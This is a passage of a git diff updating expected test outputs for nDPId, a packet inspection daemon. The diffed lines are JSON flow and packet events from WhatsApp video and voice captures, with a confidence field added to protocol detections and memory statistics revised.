+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1561455781247,"flow_last_seen":1561455791996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":792,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","total-events-serialized":81}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1567/1567
@@ -87,9 +87,9 @@
 ~~ total active/idle flows...: 14/14
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4718787 bytes
-~~ total memory freed........: 4718787 bytes
-~~ total allocations/frees...: 101176/101176
+~~ total memory allocated....: 4799476 bytes
+~~ total memory freed........: 4799476 bytes
+~~ total allocations/frees...: 102766/102766
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
 ~~ json string max len.......: 2358 chars
diff --git a/test/results/wa_voice.pcap.out b/test/results/wa_voice.pcap.out
index 2d1f542e7..f4fdd2050 100644
--- a/test/results/wa_voice.pcap.out
+++ b/test/results/wa_voice.pcap.out
@@ -1,42 +1,42 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"wa_voice.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561455687942,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1561455687942,"pkt":"xiwDYGpkkLkxKPrKCABFAAA8VCwAAP8R4ibAqAIMwKgCAcjnADUAKL4MZG8BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1561455687944,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1561455687944,"pkt":"kLkxKPrKxiwDYGpkCABFAABMq4sAAEARSbjAqAIBwKgCDAA1yOcAOH0WZG+BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"}
-00749{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1561455687944,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
+00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1561455687944,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455687991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1561455687991,"pkt":"xiwDYGpkkLkxKPrKCABFAAA89ksAAP8RQAfAqAIMwKgCAe1dADUAKOSmDHcBAAABAAAAAAAAAWcId2hhdHNhcHADbmV0AAABAAE="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455688018,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"ts_msec":1561455688018,"pkt":"kLkxKPrKxiwDYGpkCABFAABj38gAAEARFWTAqAIBwKgCDAA17V0ATz5mDHeBgAABAAIAAAAAAWcId2hhdHNhcHADbmV0AAABAAHADAAFAAEAAArzAAsEY2hhdANjZG7ADsAsAAEAAQAAAEEABJ3wFDU="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1561455688018,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.53"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1561455688018,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.53"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":1561455688201,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDyQZ7pIeMIAQCAC0bwAAAQEICjTN8KY8skLCFwMDD+Ai5NOSopi\/6GqwlD\/tAZzY1QGzvljqTGTmGCJOrU3x8CYKomrYaziO5eZ4ouY8cCYpOJvKrDNJX33pdge2bBxjgZp3ciHlbT9gHcPpJV3HIK5K4Xwsy7N\/d9l3pDdGz5PHrVVzZeXakf14DKR+hXrIhRVy6hpv5t2VthQzM3sKU7KhJpL\/6a5Sp489WK3Z7dzYFK2J+ermhE1b03GDPIEb7MGTpTJQaqangZgy8gro1eaetAilk1o529zodA1M9O5BVqL2oF301LG+kaqQTY1SPLvOnn1MxBlBEbzmsfvPr0H7C5Xcv51kP+cMU9R39VU1KEVp3e+2GMmIXWxgb+NKRMo4d5o6BKoHJ36YKQ33eAmIMAcZsFkdzfDz5q2jCxngiuQsbQKoYL1rQHGV7CXWI3zE9edQrQPJaGQZaxu\/+b+1vqSWxtCMEOUMVSmhM+FpUOqnKqwXsN4BgvySE1+U34RH0SV6FPoBjF0WGfVjkUid\/lVZcbedi\/PfkG0yBpT2\/Is9EIUqT+5Azj96UOFZqIEtSsIYSrk7ySkvjrKz5bHkeMLQk1mxQwJByZOSa30oY5bmNGAgD00g7CKAigVgWl6pq33BURhk4PDRhLJn426pN8ndnOOPzVylhr5g1C978hT8qaiuW1hlXdPnoMeCp9hEy7A5ziIjQi\/j6SVmDBSjwtJ0oqoQ\/ul2VzP1hHUGnZiTl\/qoxKKUfFrrwqTto6BvQjrKNa8bmHfrJg1RkCF3YK1iU3RCTPB\/4c68wZU3wRZ8hH1dNOLSgkwNQHFvEa\/gv\/qOxZkCS+Hpja9b5OtYooCqZnURTItdIoosw\/pte6KHG8eCIx\/U7yLLCmLs4D6MQwGZZ2yJ9zt9zcZXv1g03W4UohfquGy0ioHzSnw\/O3jNSfyTyrsrgxGqBD7B02ehphvU7Ax3IIziLDpWGnOBTyjYVNl423Z+0c9qK5fdUeybRNKKbWmwJqAFyKo3Mn2oSjBse+IbmEyy74UtCrn7MO79P00k7ZwAdz4X9zs28aMTKpnGFfXXxKMpT0Dd5ofiYXaTFr2Jwybi92XLCleA2OWxMIUro0rxoo67fYKdVxbqwQCMyEw6LTznHMXWYOpkkn6VHuawZe8M1HJsON5lEoItuqd\/IBfWUMshGlV8OgIAoc3EW3VlOFAiqg0pqVqjmyE8T8wQAvejRCf2f7iThtrzSrjIJDgibkW3Ecp3KoIC1KVlhjp4HLMvTgc12F13bDzcsr4rYSNpgOus\/4N4UzMrQyfYM2uNlqx0HfPLs50MVn\/Kyef0KdSuCHGqHLEJ+g1+EB9i2mop53wwymGotu9IoWgU02wrdRtoavOIQ5TMaPT9Jy+tmpyw9rSZn4YhMfxR72sCFIVM2eQlDOP2kti8y02qh8vwstuWp8ER3\/PKo9BgChhkuUmF5Df6lKXn1exWi67C9f1S5pc1iv33gDt3T0VcEHwoxmIh6MLrQ4LDUY7JX7mEuRfro3sR\/Ir2ufPPOhOBqsPV5YskVY9tWAevz7WMRn8EtRyvVaVHL3wxu1gErJNgcQ\/Af9fGR5KHI8lfrzLWY+bV9Q6PY8piE9FU2r7QV9Q5YgbBE6yKjPA3fOpiBOv+IVCsLXJNVdRvAywibpuoJAy2z01Fc5o3x+ZW2eqdFSSyuDepi7EBv4YJnAtmqjCVimRnoZ68Pz\/ocEFw5tBKkvU5uadJKwflJJ0hJUUOKwAQFCWvvApj3f356wTvDmU788W1R\/Vmzin60ZrsL16uD4sDmXGOueQVWddIzbIT0jyuT6IK9gJjCyELuMZhwwjNJ\/gEh8+\/PwFaVXbn\/1dsvjpj0IhPwCusRttL60194v983ySgSQpQrf9f+n\/rJIRYwpsq4DBRu9SydD72zD93mD4idl3s3tsUHh6rp5k7Bf4L"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
 02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455688202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDym57pIeMIAQCADYpQAAAQEICjTN8KY8skLCFtVfgrozcBhAJsfsFvLQO\/UNbKaPAKskPEHc2H7HNZvZ0KHfZ\/KP+B9OyPm0SdMSjavTXp1RBX4n8dtnNy7ldwySyG0XJJWeRoZiiRtgXrZdFFD0QAS3Pe1DBo\/FUctyy9XBKqwrw5v92Jj5UtBctOxUvfejQ1SPTAJ5IukXOUTVRhF+GJ6uJpn2Gyv2J\/hXj4mZyNeIliL2I7bOA3ury1GpGWko+MWMnPSKdWfc+5iZ8htj49VB2VDsL+uaCsidGqZX708pkKajJgAtzAX6+OwUhPXab61vOJn2ZVsE84On3Sc1Kl0WWtXgaA5Kty9ym4wLqQYEYP55F5oeJX4cTBOZRUcxhyM2DEPfiJE4aGH7aPKJO1JXXtoaeR6aRsid5OY044cRXoCwjbqa8kVLoyG\/1hSUaMwK17Rm6Nq+PbrF+ED8fmHgN\/1Dutcz+R4xma\/dfBoQDryBVCTEwOthrl7LLjRmNDBA\/nKPrgUx1pUPyir\/k\/cBNu5VmA9ROEDXJTcYsaqkjSroNougihkTVcfxMwA0V1eozYWnylZYZfyg3u53u+M+Do2uu\/vpHb6ZX\/5fq7AfMO72tRX4kcflTeOHJPV42uX70ZwC1O+A2X8wG0wRrb8uK6OFhHts3S52N3FVIqWr3CBOEKtXus3msBLphIaEqtw7dKWimDDeKkgZyeDybQGBbwSqGgwXI4sXoyN6QNVYT2T4i6kGXwJ8KRo8HtR5yB7rhqGJ7va7Tq2PlcpSnVIQRwao1mofCncrFLbOpoxslAuFLv8G+fW1GEiueEIhAplFAErT8lEbc6sY9uI88S0O6mDpNBlvCBLanRfw12SWljEVA4Wh2w31ojL9SCLJgyYKb3rrXT3V5i0AGJxXutmEyz9yTXUcoSU1YUo3WfmVLfx6RyxgbfoU7yfB7G33wI6gfsYIkzsYXlIla2ZkFjlWmYTCmfyEh6mVsXCVMnp1BhZdWj+7bWgfM4VrhMG0uNxDM0Z53kq9r7jYLXP1URavTKVNjY1WxQ1RAuRJtVPSgtQELf6AAzGAMW947SHl7bPC94gub8Kmqytrgl8ICRtP21Twca8YlwoKzIkJ0ROGsHSJ1IUBnknB2X57XNTUY80EyrwKOEYdXqBbK5\/uwztG9gvPjPu8PKqPu7OCXZj1ZBnnEX2PjjdGe8\/qo\/GKpAlJAuol7xe33zGz401h7+ux36y894Mbarjx1CDQxx9YqwY6Lr4EHSyCq\/xOaCM9Ig4AmEcFYjNP6niCHmI6fO24v\/GQB6WXdzSw2ClyCXHYbvr4Qqi+4qXoeh2xXDeKjcBBfLtEOni++s2q3gzhbAvkZLj\/NmeA2TXw0Z3iDbzj8\/Y4RPkg+eKwZkIo3UDfKsFnJdpryN60+cHgLr\/4b6yqkGde7QP698bVNcwUBDmhcPTGUF72BSrLQvrtwQZtWbAZrNkztpBLnQ0QkqUG4rCER6dvRqYMKv5dFfseMTa1Q1gUuqPbbz23yUKTRtop\/\/Lht4EEFlQYsfbz48ddhpIGiMg5mZbcRDG3SabEXgtzSNVHYYfQC6vW4pikjByoIlKAdhA6SR3Oh3PU52UQkf1H00x5\/\/1hV8lcpLckyN2LNUVFAYrwz5do38QxPssBrJ+3S6\/aEGPegc3B67mnX5V9KdAWJTKT9mA6BOcYDIvqCcaofS9sLdAjWNazl\/6YRqmsk\/JZn6nsHta+t4co6kKrh8ZoenAhtwbNaOVmExbItteeviDeqFUd2pkhp3kXIT8d6YMdXIloWHR8vT7oGOwNL5sNWFZXjAeqyXFLohZVoKLbw4szdHzrmDOl0IHwY6y6lYvTSYc6OyNhkaHXFSCKUjvAFZPuWmliraxAT7phw5quixNUJhdRcYng0LMN9J3KAyHFA8Ber5WNyIqMxWZ5wh4eVaY0B\/wQ"}
 02073{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455688202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgTZAABAAEAGJSPAqAIMEfI8VMDKFGdIDy9Z7pIeMIAYCACWYAAAAQEICjTN8KY8skLChD9+sl9zTIn+9oKwtdTi9Vdi\/cqtS9SsuLktLexhq+H6HSh0nUz\/pR7lGjfA8jUSbTLAiEYeFmvZtDgZTjhibXwhbTyW2ej1slX5wS0YUeKb381u+fexhn3xRkOOgFD2lHUCDNs6ZDxZ3MgjWXZ\/6y+5+G4Cr5MmO9LbbXgHM2tCoGf6bFpAilIbDNDjf72PZn2d6eJMciO25CCni3NwF1VQe25Bd9JCM8RNSipKwwpntSqY6SidwnIyNKgMjNfj+GMhuOpcSsAcRSjT\/L\/y6Nc7rkRDfvgoZpO7IrcZRsLerm0SSzH8usyI2xA+WCvEPlDoV\/87+olgpceCoKG1cf6TrD9aD7Lh7Yzi2mRYXX50kN9XYC9UhK+eEqcUiK0EA6ia38NkceSip2pBuv85\/091UH5OzSLrTUOJg+XVoE7ssGb7XKiRE+FOZu+zmhmuXn2Ujg8u76JsqT+uY0KkCyvwkXLeCV2kPGxz31MiSwGtNtz1oNvEGHur+FQDs\/zPpy1TfX803cqFKkblAu9BFTe4MXIK6IqhxFJcK3dj\/d8o2Zlvxu2S2NA3FH3zT7CWqacXhL+wQyS+\/DALOFfsZZCyD97Lwmcig1rgISji1T9qsBO4dRFWt5bVa2GoIozmHRLhPE\/xUBXrVvCjMLlRXbBby9l3tFLBkeNarajglfyHMtazotsPWceBe13wiPjaSciJqd486cT5nmripbb2TNv6m2QS+yBxolanBtMMlalvyClJnjFYXmEMA\/Cqafcjah0LpamWi5cGxlhK2o7VpcXk60WiDqklprDwU1C6AQQ3t9+In381BWOH2ylFLvtkYQS6mza73M7ORMV9T+VX4ja00u4BItehp2lgwr5wZ9hQu6lejNiwFYLaMPe7D\/bAwWtcZeYT8kAUL9H2S1idX7efThRI\/sFUnhFydcfZzFx9yoqvQ\/XNBIf8hR2ZwEmxUM7nHYq2mZ+\/B91bETK14kZx6AmSi1jqJABWenJppvp4cXzcY1BWUqJk0PLYkAexhw7t652If5IzcojeSdWFP2lhdau7nHX6G7lW4Utg7ZWXLyccWSWSv6ha+LeiDlED1cCwY2vVHkPEKRqluaQYKLl2qvR1wE3m0usuIl4q2MEc3z7A5MGmXicgQHspwoVe96OedZ9UbKdxn5F5OBTgOA+JY4EBKs3\/51SigijtnbNr7w00IZM1a32DUVsHDNnCKoJQHhPhULTSuboR4FgTKv5jA8DkAaFXzOTQQMYjx7YZD+FVCVnmqRcXzRQCUejaACj05EFq7vsiXpx9kEWnOGLDfJ22A0AjBRXoBK9EYB2xjWa+gzWXLgtnfTfAdhzT3lkAyklF\/qQA0sttDRgDxUQ4slW4E3BzVFH0h4GehIXJZzWEseP9XQr0J1UhTOB7Dv78mCeQyIVzY5PpIKGqL37IUaJV6gk4viji4bM8JRt522Xsc3xIrKuiMjhRRmYQYZR2\/fsuI+jWL\/oLRyVbeQmMYbj2qIY8qMyxD0\/HUbbJCm1sWV3U2RsK1wnhcO2gFFVKyPqfKwE0xDwAtsxVH6ZCeakAFNP5dRNlfhay6WJ8owHDTw=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1561455688445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455688445,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI7iMAAEARBjHAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
